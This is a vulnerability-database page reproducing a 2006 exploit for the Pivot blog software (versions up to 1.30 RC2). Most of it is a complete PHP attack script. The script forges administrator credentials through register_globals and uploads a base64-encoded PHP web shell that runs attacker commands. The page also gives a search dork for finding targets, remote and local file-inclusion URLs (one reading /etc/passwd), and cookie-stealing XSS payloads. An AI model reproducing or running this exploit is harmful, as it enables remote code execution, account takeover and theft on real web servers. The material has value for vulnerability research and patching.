Pivot <=1.30rc2 privilege escalation / remote commands execution

2006.07.14
Credit: rgod
Risk: High
Local: No
Remote: Yes
CWE: N/A

#!/usr/bin/php -q -d short_open_tag=on <? echo "Pivot <= 1.30 RC2 privileges escalation / remote commands execution exploitn"; echo "by rgod rgod (at) autistici (dot) org [email concealed]n"; echo "site: http://retrogod.altervista.orgn"; echo "dorks: "Powered byPivot"n"; echo "version specific: "Powered byPivot - 1.30 RC2" +Rippersnappernn"; /* works with register_globals=On */ if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONSn"; echo "host: target server (ip/hostname)n"; echo "path: path to the blogn"; echo "cmd: a shell commandn"; echo "Options:n"; echo " -p[port]: specify a port other than 80n"; echo " -P[ip:port]: specify a proxyn"; echo "Examples:n"; echo "php ".$argv[0]." localhost /blog/ ls -la -p81n"; echo "php ".$argv[0]." localhost /blog/ ls -la -P1.1.1.1:80nn"; die; } /* software site: http://www.pivotlog.net/ i) vulnerable code in pv_core.php at line 23-24 and in CheckLogin() function: ... // some global initialisation stuff $Pivot_Vars = array_merge($_GET , $_POST, $_SERVER); ... function CheckLogin() { global $Users, $Pivot_Vars, $Cfg; // User is banned.. if(isset($Cfg['bn_' . $_SERVER['REMOTE_ADDR']])){ Login(1, 1, "User is banned"); } // added to not check for referers if no session id is given.. if(!isset($Pivot_Vars['session'])){ <-------------[!] $uri = 'http://' . $Pivot_Vars['HTTP_HOST'] . $Pivot_Vars['SCRIPT_NAME']; if(strpos($Pivot_Vars['HTTP_REFERER'], $uri)!=0){ $Pivot_Vars['user'] = ''; Login(0, 2, "No session active."); } } // If we selected logout from the menu.. if( isset($Pivot_Vars['func']) && ($Pivot_Vars['func'] == 'login') && isset($Pivot_Vars['do']) && ($Pivot_Vars['do'] == 'logout')){ setcookie('user', '', -9999,"/"); setcookie('pass', '', -9999,"/"); setcookie('mode', 'nothing', -9999,"/"); unset($Users[$Cfg['tempsessions'][$Pivot_Vars['session']][0]]['session'] ); unset($Cfg['tempsessions'][$Pivot_Vars['session']]); SaveSettings(); login(0,3, "User logged off"); } // if the user has cookies set, but no session is active yet.. if( isset($_COOKIE['user']) && isset($_COOKIE['hash']) && ($_COOKIE['mode'] == 'stayloggedin') && <----------- [!!!] ( (!isset($Pivot_Vars['session'])) || ($Pivot_Vars['session'] == "")) ) { debug("attempted ReviveSession.."); // Try to revive an old Session.. ReviveSession(); } else if(($Pivot_Vars['func'] == 'login') || ($Pivot_Vars['do'] == 'login')) { // if we've just logged in, reset the cookies, if necesary and start a new session.. debug("attempted login.."); if ( ($Users[$Pivot_Vars['user']]['pass'] == md5($Pivot_Vars['pass'])) <-------------- [!!!!] && ($Users[$Pivot_Vars['user']]['userlevel']>0) ) { NewSession($Pivot_Vars['user']); }else{ // add one to the failed login attempts. if(strlen($Pivot_Vars['user']) > 0) { $Cfg['fl_' . $_SERVER['REMOTE_ADDR']]++; } Login(1,4, "Incorrect username or password"); } } else { // when running normally, the session stuff is updated. $Pivot_Vars['user'] = $Cfg['tempsessions'][$Pivot_Vars['session']][0]; $ip = substr( $_SERVER['REMOTE_ADDR'], 0, strrpos( $_SERVER['REMOTE_ADDR'], ".")); // calculated locally: user's pass + current session + ip we got from user $hash1 = md5( md5( $Users[$Pivot_Vars['user']]['pass'] . $Pivot_Vars['session'] ) . $ip ) ; // stored hash $hash2 = $Cfg['tempsessions'][$Pivot_Vars['session']][1]; // we check if the two hash matches with the one that was stored if ($hash1 != $hash2) { // if this is the case, something's not ok, so go back to login.. Login(0,0, "No hacking, please"); } } // If by this point no session is set, we will show the login screen.. if(strlen($Pivot_Vars['session']) == 0) { Login(0,8, "Please log on. (if you keep getting this message, delete the cookies for this site)"); } // Update the timer, so we can keep the user logged in. if($Cfg['tempsessions'][$Pivot_Vars['session']][2] - time() <= ($Cfg['session_length'] / 4)) { $Cfg['tempsessions'][$Pivot_Vars['session']][2] = $Cfg['tempsessions'][$Pivot_Vars['session']][2] + $Cfg['session_length']; } } ... a remote user can overwrite $Pivot_Vars array and, if register_globals=on, $Users one, to escalate privileges, then he can upload php files in images/ folder through the includes/editor/insert_image.php script ii) arbitrary remote inclusion (on php5) with register_globals=On http://[target]/pivot/includes/edit_new.php?Paths[extensions_path]=ftp:/ /username:password (at) somehost (dot) com [email concealed]/ where on somehost.com we have a hooks/pre_editor_normal.php with some shellcode inside and local inclusion with register_globals=On & magic_quotes_gpc=Off http://[target]/pivot/includes/edit_new.php?Paths[extensions_path]=/etc/ passwd%00 iii) various xss with register_globals=On: http://[target]/[path]/pivot/includes/blogroll.php?fg=[XSS] http://[target]/[path]/pivot/includes/blogroll.php?line1=[XSS] http://[target]/[path]/pivot/includes/blogroll.php?line2=[XSS] http://[target]/[path]/pivot/includes/blogroll.php?bg=[XSS] http://[target]/[path]/pivot/includes/blogroll.php?c1=[XSS] http://[target]/[path]/pivot/includes/blogroll.php?c2=[XSS] http://[target]/[path]/pivot/includes/blogroll.php?c3=[XSS] http://[target]/[path]/pivot/includes/blogroll.php?c4=[XSS] http://[target]/[path]/pivot/includes/editor/edit_menu.php?name=[XSS] http://[target]/[path]/pivot/includes/editor/edit_menu.php?js_name=[XSS] iv) regardless of magic_quotes_gpc, xss: http://[target]/[path]/pivot/includes/photo.php?h=><script>alert(documen t.cookie)</script> http://[target]/[path]/pivot/includes/photo.php?w=><script>alert(documen t.cookie)</script> this is the poc exploit tool for i) */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";} } return $exa."rn".$result; } $proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "rn".$html; } $host=$argv[1]; $path=$argv[2]; $cmd=""; $port=80; $proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $magic_var="suntzu"; //no matter how you call him $shell="error_reporting(0);if(get_magic_quotes_gpc()){$_COOKIE["cmd"] =stripslashes($_COOKIE["cmd"]);}set_time_limit(0);echo "my_delim";passthru($_COOKIE["cmd"]);echo "my_delim";"; $shell=base64_encode($shell); $data='-----------------------------7d62702f250530 Content-Disposition: form-data; name="userfile"; filename="cfg.php"; Content-Type: text/plain <?php;eval(base64_decode("'.$shell.'"));?> -----------------------------7d62702f250530-- '; $packet="POST ".$p."pivot/includes/editor/insert_image.php?session=".$magic_var."&func =login&pass=".$magic_var."&user=".$magic_var."&Users[".$magic_var."][pas s]=".md5($magic_var)."&Users[".$magic_var."][userlevel]=1 HTTP/1.0rn"; $packet.="User-Agent: Googlebot/2.1rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Cookie: hash=; mode=stayloggedin; user=;rn"; $packet.="Connection: Closernrn"; $packet.=$data; sendpacketii($packet); sleep(1); //shell.php is renamed to shell.php.php $packet="GET ".$p."images/cfg.php.php HTTP/1.0rn"; $packet.="User-Agent: Googlebot/2.1rn"; $packet.="Host: ".$host."rn"; $packet.="Cookie: cmd=".$cmd.";rn"; $packet.="Connection: Closernrn"; sendpacketii($packet); if (strstr($html,"my_delim")) { $temp=explode("my_delim",$html); die("exploit succeeded...nn".$temp[1]); } //if you are here... echo "exploit failed..."; ?> original url: http://retrogod.altervista.org/pivot_130RC2_xpl.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top